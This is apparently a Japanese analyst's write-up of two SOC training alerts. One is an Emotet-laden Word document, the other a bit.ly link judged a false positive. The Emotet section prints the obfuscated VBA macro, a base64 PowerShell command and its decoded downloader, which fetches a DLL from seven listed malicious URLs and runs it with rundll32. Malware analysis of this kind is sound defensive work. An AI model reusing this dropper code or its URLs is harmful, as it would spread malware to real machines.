• Details
• playbook
  • Define Threat Indicator
  • Check if the malware is quarantined/cleaned
  • Analyze Malware
    • eee99e6d8ade9463dd206dfbad3485ea
      • http[:]//decpak.com/cgi-bin/gU/
  • Check If Someone Requested the C2
    • Log search - 172.16.17.83
      • 330
      • 331
      • 332
  • Containment
    • Endpoint - Maxim 172.16.17.83
      • CMD History
      • Network Connections
  • Add Artifacts
• End

Details

EventID: 39
Event Time: Jan. 1, 2021, 4:45 p.m.
Rule: SOC109 - Emotet Malware Detected
Level: Security Analyst
Source Address 172.16.17.83
Source Hostname Maxim
File Name MES 2020_12_31 S632974.doc
File Hash eee99e6d8ade9463dd206dfbad3485ea
File Size 161.36 Kb
Device Action Allowed
Download (Password:infected): eee99e6d8ade9463dd206dfbad3485ea.zip

playbook

Define Threat Indicator

Answer:Other

Check if the malware is quarantined/cleaned

Device Action Allowed

Answer: Not Quarantined

Analyze Malware

eee99e6d8ade9463dd206dfbad3485ea

VirusTotal 47/62: https://www.virustotal.com/gui/file/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c
Hybrid Analysis: https://www.hybrid-analysis.com/sample/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c/5fefe8368593b70319655413
ANYRUN: https://app.any.run/tasks/5621decd-153d-4982-92c6-e7bddeafde2e/
VirusTotalを見ると多くのベンダーで登録されている既知のマルウェアのようだ。
vbaマクロを実行し、リモートのサーバからファイルを取得している。

このファイルをoletoolsのolevbaで見てみると、

Private Sub Document_open()
Rscxe50kzk0uy8c57h
End Sub
---
Function Rscxe50kzk0uy8c57h()
On Error Resume Next
mKbjhqs = Yfz878jqfi8emxj8k.StoryRanges.Item(4 / 4)
   GoTo GgbBEBHp
Dim agRmIUza As Object
Set agRmIUza = CreateObject("Scripting.FileSystemObject")
Dim GgbBEBHp As Object
Set GgbBEBHp = agRmIUza.CreateTextFile("K:\hHLZv\tivKHBG.fyEWE")
GgbBEBHp.WriteLine " "
GgbBEBHp.Close
Set agRmIUza = Nothing
Set GgbBEBHp = Nothing
GgbBEBHp:
snahbsd = "]e1r[Sp]e1r[S"
Lq83qqs1pfyjio1yve = "]e1r[Sro]e1r[S]e1r[Sce]e1r[Ss]e1r[Ss]e1r[S]e1r[S"
   GoTo XgvEJCBN
Dim QziRLaIvB As Object
Set QziRLaIvB = CreateObject("Scripting.FileSystemObject")
Dim XgvEJCBN As Object
Set XgvEJCBN = QziRLaIvB.CreateTextFile("K:\ngiHBhtC\UfeKFo.VughFHEh")
XgvEJCBN.WriteLine " "
XgvEJCBN.Close
Set QziRLaIvB = Nothing
Set XgvEJCBN = Nothing
XgvEJCBN:
U5loi1_jmnzaqiegq = "]e1r[S:w]e1r[S]e1r[Sin]e1r[S3]e1r[S2]e1r[S_]e1r[S"
   GoTo hgtMNEDC
Dim CZSeKtG As Object
Set CZSeKtG = CreateObject("Scripting.FileSystemObject")
Dim hgtMNEDC As Object
Set hgtMNEDC = CZSeKtG.CreateTextFile("K:\cpFBJFDH\xlJbHCC.QYTeJIEGD")
hgtMNEDC.WriteLine " "
hgtMNEDC.Close
Set CZSeKtG = Nothing
Set hgtMNEDC = Nothing
hgtMNEDC:
H_7tattyau5usczkpn = "w]e1r[Sin]e1r[Sm]e1r[Sgm]e1r[St]e1r[S]e1r[S"
   GoTo KiKEBuJUJ
Dim PTQDJLrW As Object
Set PTQDJLrW = CreateObject("Scripting.FileSystemObject")
Dim KiKEBuJUJ As Object
Set KiKEBuJUJ = PTQDJLrW.CreateTextFile("K:\soeBQFQDw\WMRIMPG.JKyoFAF")
KiKEBuJUJ.WriteLine " "
KiKEBuJUJ.Close
Set PTQDJLrW = Nothing
Set KiKEBuJUJ = Nothing
KiKEBuJUJ:
B0r8pge9ex02he = "]e1r[S" + Mid(Application.Name, 6, 1) + "]e1r[S"
   GoTo VvbAPGB
Dim wHaMWCAF As Object
Set wHaMWCAF = CreateObject("Scripting.FileSystemObject")
Dim VvbAPGB As Object
Set VvbAPGB = wHaMWCAF.CreateTextFile("K:\bzWJHl\KFaka.azsvpH")
VvbAPGB.WriteLine " "
VvbAPGB.Close
Set wHaMWCAF = Nothing
Set VvbAPGB = Nothing
VvbAPGB:
Opoqhvp43yj = H_7tattyau5usczkpn + B0r8pge9ex02he + U5loi1_jmnzaqiegq + snahbsd + Lq83qqs1pfyjio1yve
   GoTo eNfOI
Dim EatwI As Object
Set EatwI = CreateObject("Scripting.FileSystemObject")
Dim eNfOI As Object
Set eNfOI = EatwI.CreateTextFile("K:\rThUJp\jvUYFCcC.bwpqgxnl")
eNfOI.WriteLine " "
eNfOI.Close
Set EatwI = Nothing
Set eNfOI = Nothing
eNfOI:
Z13pi8fctd_bd7 = H_f1l3q4wuv(Opoqhvp43yj)
   GoTo mttHC
Dim ZUSgTSS As Object
Set ZUSgTSS = CreateObject("Scripting.FileSystemObject")
Dim mttHC As Object
Set mttHC = ZUSgTSS.CreateTextFile("K:\tRMsNA\ZxNIJGBC.emQhvJFE")
mttHC.WriteLine " "
mttHC.Close
Set ZUSgTSS = Nothing
Set mttHC = Nothing
mttHC:
Set M3zy0l7te6wcqq4_r = CreateObject(Z13pi8fctd_bd7)
   GoTo XCtMEEHQH
Dim JEnFGGAH As Object
Set JEnFGGAH = CreateObject("Scripting.FileSystemObject")
Dim XCtMEEHQH As Object
Set XCtMEEHQH = JEnFGGAH.CreateTextFile("K:\KUvdSiCG\SWvOUGCM.yuplAASB")
XCtMEEHQH.WriteLine " "
XCtMEEHQH.Close
Set JEnFGGAH = Nothing
Set XCtMEEHQH = Nothing
XCtMEEHQH:
Px4akgkluolo7in096 = Mid(mKbjhqs, (15 / 3), Len(mKbjhqs))
   GoTo pHBuBEG
Dim gSXBEs As Object
Set gSXBEs = CreateObject("Scripting.FileSystemObject")
Dim pHBuBEG As Object
Set pHBuBEG = gSXBEs.CreateTextFile("K:\TskVJVn\aafpAJrAE.vUXKLFw")
pHBuBEG.WriteLine " "
pHBuBEG.Close
Set gSXBEs = Nothing
Set pHBuBEG = Nothing
pHBuBEG:
   GoTo cxLTHBCC
Dim aNVjIUF As Object
Set aNVjIUF = CreateObject("Scripting.FileSystemObject")
Dim cxLTHBCC As Object
Set cxLTHBCC = aNVjIUF.CreateTextFile("K:\WJmHGBxDH\atxzHEHY.mWWMoDHPG")
cxLTHBCC.WriteLine " "
cxLTHBCC.Close
Set aNVjIUF = Nothing
Set cxLTHBCC = Nothing
cxLTHBCC:
M3zy0l7te6wcqq4_r.Create H_f1l3q4wuv(Px4akgkluolo7in096), Rzvbvgf_vxrf, I3hfd4821r3zv
   GoTo pyPIA
Dim qhLiwn As Object
Set qhLiwn = CreateObject("Scripting.FileSystemObject")
Dim pyPIA As Object
Set pyPIA = qhLiwn.CreateTextFile("K:\GGDxTNF\IePRJDt.eCBBOz")
pyPIA.WriteLine " "
pyPIA.Close
Set qhLiwn = Nothing
Set pyPIA = Nothing
pyPIA:
   GoTo YiaTHFMA
Dim LPMlGRFHC As Object
Set LPMlGRFHC = CreateObject("Scripting.FileSystemObject")
Dim YiaTHFMA As Object
Set YiaTHFMA = LPMlGRFHC.CreateTextFile("K:\fFLaGYBH\ZvDXsFT.IXtjnt")
YiaTHFMA.WriteLine " "
YiaTHFMA.Close
Set LPMlGRFHC = Nothing
Set YiaTHFMA = Nothing
YiaTHFMA:
End Function
Function H_f1l3q4wuv(H11p8eic2w3zn_)
On Error Resume Next
   GoTo jkZdJG
Dim mfixAuM As Object
Set mfixAuM = CreateObject("Scripting.FileSystemObject")
Dim jkZdJG As Object
Set jkZdJG = mfixAuM.CreateTextFile("K:\bVbhWbGD\jTqgJ.GHrZkJCF")
jkZdJG.WriteLine " "
jkZdJG.Close
Set mfixAuM = Nothing
Set jkZdJG = Nothing
jkZdJG:
Bfizqcunyu0 = (H11p8eic2w3zn_)
   GoTo SeNkICAJ
Dim HRDLEVmi As Object
Set HRDLEVmi = CreateObject("Scripting.FileSystemObject")
Dim SeNkICAJ As Object
Set SeNkICAJ = HRDLEVmi.CreateTextFile("K:\AkYbFA\BnmqHkXA.oujVB")
SeNkICAJ.WriteLine " "
SeNkICAJ.Close
Set HRDLEVmi = Nothing
Set SeNkICAJ = Nothing
SeNkICAJ:
P_eiv2i047gos2b = Zh7kypwwff0md33a(Bfizqcunyu0)
   GoTo ZyJBNBD
Dim kIuKr As Object
Set kIuKr = CreateObject("Scripting.FileSystemObject")
Dim ZyJBNBD As Object
Set ZyJBNBD = kIuKr.CreateTextFile("K:\inSuIwND\usjkXC.fwloXI")
ZyJBNBD.WriteLine " "
ZyJBNBD.Close
Set kIuKr = Nothing
Set ZyJBNBD = Nothing
ZyJBNBD:
H_f1l3q4wuv = P_eiv2i047gos2b
   GoTo qoPKJgV
Dim naVxBFJAJ As Object
Set naVxBFJAJ = CreateObject("Scripting.FileSystemObject")
Dim qoPKJgV As Object
Set qoPKJgV = naVxBFJAJ.CreateTextFile("K:\JhzlFCAB\Jfiuz.aptrJGAA")
qoPKJgV.WriteLine " "
qoPKJgV.Close
Set naVxBFJAJ = Nothing
Set qoPKJgV = Nothing
qoPKJgV:
End Function
Function Zh7kypwwff0md33a(L34u2dzesgzcfaiwy)
Zlnor_53jwsrz = Ziq909ju8euif9uz
   GoTo HQnFde
Dim aNITDI As Object
Set aNITDI = CreateObject("Scripting.FileSystemObject")
Dim HQnFde As Object
Set HQnFde = aNITDI.CreateTextFile("K:\RMIpGDjgI\TjPglA.JFIpEFW")
HQnFde.WriteLine " "
HQnFde.Close
Set aNITDI = Nothing
Set HQnFde = Nothing
HQnFde:
Zh7kypwwff0md33a = Replace(L34u2dzesgzcfaiwy, "]e1r[S", Rnclsjpi29gic5)
   GoTo UMVjHQHCH
Dim gscDYEBhG As Object
Set gscDYEBhG = CreateObject("Scripting.FileSystemObject")
Dim UMVjHQHCH As Object
Set UMVjHQHCH = gscDYEBhG.CreateTextFile("K:\yJFQHkpC\FiUeelAjF.QixxE")
UMVjHQHCH.WriteLine " "
UMVjHQHCH.Close
Set gscDYEBhG = Nothing
Set UMVjHQHCH = Nothing
UMVjHQHCH:
End Function

おそらくこのvbaは次のコマンドを実行している。

cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. &  P^Ow^er^she^L^L -w hidden -ENCOD                 UwBFAFQALQBpAHQARQBtACAAIAAoACcAdgAnACsAJwBBAHIASQBhACcAKwAnAGIAJwArACcATABFADoAdABJAFMAOAAnACsAJwBDAHEAJwApACAAIAAoAFsAdAB5AFAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADUAfQB7ADQAfQB7ADEAfQB7ADIAfQAiACAALQBmACcAcwAnACwAJwAuAEQASQBSACcALAAnAEUAQwBUAE8AUgB5ACcALAAnAHkAUwB0AGUAbQAnACwAJwBJAE8AJwAsACcALgAnACkAIAAgACkAIAAgADsAIAAgACAAUwBFAHQALQBpAHQAZQBtACAAVgBBAFIAaQBhAEIAbABlADoAOAA1AFkAIAAoAFsAVABZAFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADIAfQB7ADgAfQB7ADEAfQB7ADAAfQB7ADQAfQB7ADkAfQB7ADcAfQB7ADYAfQAiACAALQBGACAAJwByACcALAAnAC4AUwBlACcALAAnAE0ALgAnACwAJwBUAEUAJwAsACcAVgBJAEMAZQBQAE8AJwAsACcAcwB5AFMAJwAsACcAYQBOAGEARwBlAHIAJwAsACcAVABNACcALAAnAE4AZQBUACcALAAnAEkAbgAnACkAKQAgADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwArACcAdABsACcAKQArACcAeQBDACcAKwAoACcAbwBuAHQAaQBuACcAKwAnAHUAJwApACsAJwBlACcAKQA7ACQARwBtAGwAdABoAHAANwA9ACQAQgA3ADYAQwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUAA0ADYAWAA7ACQAVAAzADcAWQA9ACgAKAAnAEQAJwArACcAMwA1ACcAKQArACcASQAnACkAOwAgACAAJABUAEkAcwA4AEMAcQA6ADoAIgBDAHIARQBgAEEAdABgAEUAZABJAHIAZQBjAGAAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcARwA2ACcAKwAnAFQAJwArACcARgAyAHMAJwApACsAKAAnADIAawAnACsAJwAzAG0AJwApACsAKAAnAEcANgBUACcAKwAnAEoAdwAnACkAKwAnAHcAOQAnACsAJwB3AF8AJwArACcAYgBHACcAKwAnADYAVAAnACkAIAAtAHIARQBQAGwAYQBjAGUAKABbAEMAaABhAFIAXQA3ADEAKwBbAEMAaABhAFIAXQA1ADQAKwBbAEMAaABhAFIAXQA4ADQAKQAsAFsAQwBoAGEAUgBdADkAMgApACkAOwAkAFUAMAA0AFoAPQAoACcARgAnACsAKAAnADUANwAnACsAJwBVACcAKQApADsAIAAoACAAdgBBAFIAaQBBAGIATABlACAAIAA4ADUAeQAgACAALQBWAGEAbAB1AGUATwApADoAOgAiAHMAZQBDAFUAcgBgAGkAYABUAFkAcABSAE8AdABPAGAAYwBPAGwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEoAMwA0AE8APQAoACcAUQAwACcAKwAnADkAQQAnACkAOwAkAFQANAB3ADMAZwBvAHUAIAA9ACAAKAAnAEwAJwArACgAJwBfACcAKwAnADAARQAnACkAKQA7ACQARAAwADUAUQA9ACgAJwBUADIAJwArACcAOABMACcAKQA7ACQATwBkAHcAdQBtAGsAeAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEYAMgBzACcAKwAoACcAMgAnACsAJwBrADMAJwApACsAJwBtAHsAMAB9AEoAdwB3ACcAKwAoACcAOQB3ACcAKwAnAF8AYgAnACkAKwAnAHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAGMASABBAFIAXQA5ADIAKQArACQAVAA0AHcAMwBnAG8AdQArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAEUAMwA3AFEAPQAoACgAJwBFACcAKwAnADkAOAAnACkAKwAnAEgAJwApADsAJABBAHoAZwBsADgAMgBuAD0AKAAoACcAXQBlADEAJwArACcAcgAnACkAKwAoACcAWwAnACsAJwBTADoALwAvACcAKQArACcAZABlACcAKwAnAGMAJwArACgAJwBwACcAKwAnAGEAawAuAGMAJwApACsAJwBvACcAKwAoACcAbQAnACsAJwAvAGMAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAaQBuAC8AZwBVACcAKwAnAC8AQABdACcAKQArACgAJwBlACcAKwAnADEAcgAnACkAKwAnAFsAUwAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAGEAJwArACcAbgAnACkAKwAoACcAZwBlAGwAJwArACcAcwBsACcAKQArACgAJwBsAGkAJwArACcAbQAnACkAKwAoACcAYQAnACsAJwByACcAKwAnAGcAYQBzAC4AYwBvAG0ALwBBACcAKwAnAFUARAAnACkAKwAoACcASQAnACsAJwBPAC8AMwBkACcAKQArACgAJwB3AG0ALwBAACcAKwAnAF0AJwArACcAZQAxACcAKwAnAHIAWwAnACkAKwAoACcAUwAnACsAJwA6AC8ALwBnACcAKQArACgAJwBhAGQAJwArACcAZwAnACkAKwAnAGUAJwArACgAJwB0AGIAJwArACcAYQB5AC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACcALwBsACcAKwAoACcAZQB0AHMAZAAnACsAJwBlACcAKwAnAGEAbAAvAGcAJwArACcAZABGAGoAZgBRAC8AQAAnACkAKwAoACcAXQAnACsAJwBlADEAJwApACsAKAAnAHIAWwBTACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvAGMAcwAnACsAJwBnAGMAYQByAGcAJwArACcAbwAnACsAJwAuAGMAbwBtAC8AYwBvAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBHAGIALwAnACsAJwBAACcAKwAnAF0AZQAxAHIAJwApACsAJwBbACcAKwAoACcAUwA6AC8AJwArACcALwAnACkAKwAnAGEAJwArACgAJwBhACcAKwAnAGcAegB6ACcAKQArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AJwArACcAdABlACcAKQArACcAbgB0ACcAKwAnAC8ASwAnACsAKAAnAFAAJwArACcALwBAACcAKQArACgAJwBdAGUAJwArACcAMQByAFsAUwBzACcAKwAnADoAJwApACsAKAAnAC8ALwBtAGUAdABhACcAKwAnAGQAJwApACsAJwBvAHIAJwArACgAJwByACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AJwArACcAQQBMAEYAQQAnACkAKwAnAF8AJwArACgAJwBEAEEAJwArACcAVABBAC8AJwApACsAJwBCAHQAJwArACgAJwBmAE0AJwArACcAOAAnACkAKwAoACcASQAnACsAJwBkAC8AQABdAGUAMQAnACsAJwByAFsAJwArACcAUwAnACsAJwBzADoALwAvAHMAJwApACsAJwBlACcAKwAnAG4AJwArACgAJwB0AHUAcgBrACcAKwAnAGUAJwApACsAKAAnAHQAaQAnACsAJwBjAGEAcgBlAHQALgBjAG8AJwArACcAbQAvACcAKwAnAHcAcAAnACsAJwAtAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwB5AE8AJwArACcAbAAvACcAKQApAC4AIgBSAGUAcABgAEwAYABBAGMAZQAiACgAKAAnAF0AJwArACcAZQAxACcAKwAoACcAcgBbACcAKwAnAFMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAHAAbABgAGkAdAAiACgAJABNADAAMQBMACAAKwAgACQARwBtAGwAdABoAHAANwAgACsAIAAkAEcANQA1AFMAKQA7ACQAVQAxADIAWQA9ACgAJwBJAF8AJwArACcAMABJACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAGMAXwB0ADYAcgAgAGkAbgAgACQAQQB6AGcAbAA4ADIAbgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAcwB5AFMAVABlAG0ALgBOAGUAdAAuAFcARQBiAGMAbABpAGUATgB0ACkALgAiAEQAbwBgAFcATgBMAE8AYQBkAGYASQBgAEwAZQAiACgAJABYAHIAYwBfAHQANgByACwAIAAkAE8AZAB3AHUAbQBrAHgAKQA7ACQARQA3ADAAUAA9ACgAJwBKACcAKwAoACcANAAyACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQATwBkAHcAdQBtAGsAeAApAC4AIgBMAGUATgBnAGAAVABIACIAIAAtAGcAZQAgADMAOQAxADYAMwApACAAewAmACgAJwByAHUAbgBkACcAKwAnAGwAJwArACcAbAAzADIAJwApACAAJABPAGQAdwB1AG0AawB4ACwAKAAnAEMAJwArACgAJwBvAG4AJwArACcAdAAnACkAKwAoACcAcgBvACcAKwAnAGwAXwBSAHUAJwApACsAJwBuACcAKwAoACcARABMACcAKwAnAEwAJwApACkALgAiAHQATwBgAHMAVABgAFIASQBOAEcAIgAoACkAOwAkAEcANgA1AE8APQAoACgAJwBXAF8AJwArACcANAAnACkAKwAnAEYAJwApADsAYgByAGUAYQBrADsAJABUAF8ANABGAD0AKAAnAEQANwAnACsAJwA0AFAAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABWADUANQBPAD0AKAAnAEEAJwArACgAJwA1ACcAKwAnADIAWgAnACkAKQA=

実行しているpowershellのコマンドは、

SET-itEm  ('v'+'ArIa'+'b'+'LE:tIS8'+'Cq')  ([tyPE]("{0}{3}{5}{4}{1}{2}" -f's','.DIR','ECTORy','yStem','IO','.')  )  ;   SEt-item VARiaBle:85Y ([TYPE]("{5}{3}{2}{8}{1}{0}{4}{9}{7}{6}" -F 'r','.Se','M.','TE','VICePO','syS','aNaGer','TM','NeT','In')) ;$ErrorActionPreference = (('S'+'ilen'+'tl')+'yC'+('ontin'+'u')+'e');$Gmlthp7=$B76C + [char](64) + $P46X;$T37Y=(('D'+'35')+'I');  $TIs8Cq::"CrE`At`EdIrec`TOrY"($HOME + ((('G6'+'T'+'F2s')+('2k'+'3m')+('G6T'+'Jw')+'w9'+'w_'+'bG'+'6T') -rEPlace([ChaR]71+[ChaR]54+[ChaR]84),[ChaR]92));$U04Z=('F'+('57'+'U')); ( vARiAbLe  85y  -ValueO)::"seCUr`i`TYpROtO`cOl" = ('Tl'+('s1'+'2'));$J34O=('Q0'+'9A');$T4w3gou = ('L'+('_'+'0E'));$D05Q=('T2'+'8L');$Odwumkx=$HOME+(('{0}F2s'+('2'+'k3')+'m{0}Jww'+('9w'+'_b')+'{0'+'}') -F[cHAR]92)+$T4w3gou+(('.d'+'l')+'l');$E37Q=(('E'+'98')+'H');$Azgl82n=((']e1'+'r')+('['+'S://')+'de'+'c'+('p'+'ak.c')+'o'+('m'+'/cg')+('i'+'-bin/gU'+'/@]')+('e'+'1r')+'[S'+':'+'/'+('/a'+'n')+('gel'+'sl')+('li'+'m')+('a'+'r'+'gas.com/A'+'UD')+('I'+'O/3d')+('wm/@'+']'+'e1'+'r[')+('S'+'://g')+('ad'+'g')+'e'+('tb'+'ay.')+('co'+'m')+'/l'+('etsd'+'e'+'al/g'+'dFjfQ/@')+(']'+'e1')+('r[S'+'s')+(':'+'//cs'+'gcarg'+'o'+'.com/conte'+'nt')+('/Gb/'+'@'+']e1r')+'['+('S:/'+'/')+'a'+('a'+'gzz')+'.c'+'o'+('m/wp'+'-con'+'te')+'nt'+'/K'+('P'+'/@')+(']e'+'1r[Ss'+':')+('//meta'+'d')+'or'+('r'+'.c')+('om/'+'ALFA')+'_'+('DA'+'TA/')+'Bt'+('fM'+'8')+('I'+'d/@]e1'+'r['+'S'+'s://s')+'e'+'n'+('turk'+'e')+('ti'+'caret.co'+'m/'+'wp'+'-ad')+('min'+'/yO'+'l/'))."Rep`L`Ace"((']'+'e1'+('r['+'S')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."Spl`it"($M01L + $Gmlthp7 + $G55S);$U12Y=('I_'+'0I');foreach ($Xrc_t6r in $Azgl82n){try{(&('New-O'+'b'+'ject') sySTem.Net.WEbclieNt)."Do`WNLOadfI`Le"($Xrc_t6r, $Odwumkx);$E70P=('J'+('42'+'C'));If ((.('Get-'+'Ite'+'m') $Odwumkx)."LeNg`TH" -ge 39163) {&('rund'+'l'+'l32') $Odwumkx,('C'+('on'+'t')+('ro'+'l_Ru')+'n'+('DL'+'L'))."tO`sT`RING"();$G65O=(('W_'+'4')+'F');break;$T_4F=('D7'+'4P')}}catch{}}$V55O=('A'+('5'+'2Z'))

このスクリプトは、以下のURLから何かを取得しようとしている。

http://decpak.com/cgi-bin/gU/
http://angelsllimargas.com/AUDIO/3dwm/
http://gadgetbay.com/letsdeal/gdFjfQ/
https://csgcargo.com/content/Gb/
http://aagzz.com/wp-content/KP/
https://metadorr.com/ALFA_DATA/BtfM8Id/
https://senturketicaret.com/wp-admin/yOl/

このURLを調べると例えば、

http[:]//decpak.com/cgi-bin/gU/

URLhaus: https://urlhaus.abuse.ch/url/945783/
Emotet!!!


Answer: Malicious

Check If Someone Requested the C2

Log search - 172.16.17.83

172.16.17.83からのアクセスを見る。

330

URL: http://decpak.com/cgi-bin/gU/
Request Method: GET

331

URL: http://152.170.79.100/076ay2uof/umojx2x1vf1qjjk/hue4e670x/d3eobn8z0k0rp/syaxabx0loj/erz7hayf/
Request Method: GET

332

URL: http://190.247.139.101/i3u3l3e3n96/sow63klj/pkv3runqw/dudwqjl4zg8l7hk6ah6/huulsuajy/nibyefksabf1mz63/
Request Method: GET

先ほど挙げたemotetに関連するサーバへのアクセスを確認した。
また、152.170.79.100と190.247.139.101に関してはVirusTotalで見ると、
152.170.79.100: https://www.virustotal.com/gui/ip-address/152.170.79.100/community
190.247.139.101: https://www.virustotal.com/gui/ip-address/190.247.139.101/community
Emotetと関連するというレポートがある。


Answer: Accessed

Containment

Endpoint - Maxim 172.16.17.83

CMD History

01.01.2021 10:21: ipconfig
01.01.2021 10:22: netsh interface ipv4 show config
01.01.2021 10:23: arp -a

emotetによるネットワークの情報収集か。

Network Connections

01.01.2021 16:21: 172.217.169.174
01.01.2021 16:22: 172.217.169.174
01.01.2021 16:23: 172.217.169.174
01.01.2021 16:42: 152.170.79.100
01.01.2021 16:43: 190.247.139.101

172.217.169.174は問題無さそう。

Add Artifacts

End

• Details
• playbook
  • Search Log
    • 333
  • Analyze URL Address
    • https[:]//bit.ly/3hNuByx
  • Add Artifacts
• End

Details

EventID: 40
Event Time: Jan. 2, 2021, 4:33 a.m.
Rule: SOC110 - Proxy - Cryptojacking Detected
Level: Security Analyst
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 67.199.248.10
Destination Hostname bit.ly
Username Bill
Request URL https[:]//bit.ly/3hNuByx
User Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Device Action Allowed

playbook

Search Log

関連するbit.lyへのアクセスは、

333

Request URL: https[:]//bit.ly/3hNuByx
Request Method: GET
Device Action: Allowed
Process: chrome.exe
Parent Process: explorer.exe
Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e

特に手がかりとはなりそうにない。

Analyze URL Address

https[:]//bit.ly/3hNuByx

とりあえず、今回はANYRUNでアクセスしてみたが、
https://bit.ly/3hNuByx - Interactive analysis - ANY.RUN
youtubeに飛ばされた。(にしても皆さんRick Astley好きすぎでは)
IPはbit.lyなので調べても仕方が無い。
VirusTotal: https://www.virustotal.com/gui/url/adfec822d4fcad54498ca55f6226b88847752287fd08fc45f0c4c9fe1ebcb469/details
VirusTotalのdetailを見てもやはりRick Astley。Malwareらしいが根拠が分からない。
HYBRID-ANALYSIS: https://www.hybrid-analysis.com/sample/c75258d37589b2e0f993b1097642839b9d1571d9f36518ad636be474e93fa065/5ffcf027ac776500604d4369
レポートがあったが、Malicious Indicatorsに記載のものは今回のURLの話なのだろうか。違うのではないだろうか。
とりあえず現段階のこのURLは問題は無いと判断する。
Answer: Non-malicious

Add Artifacts

これはさすがにFPです。

End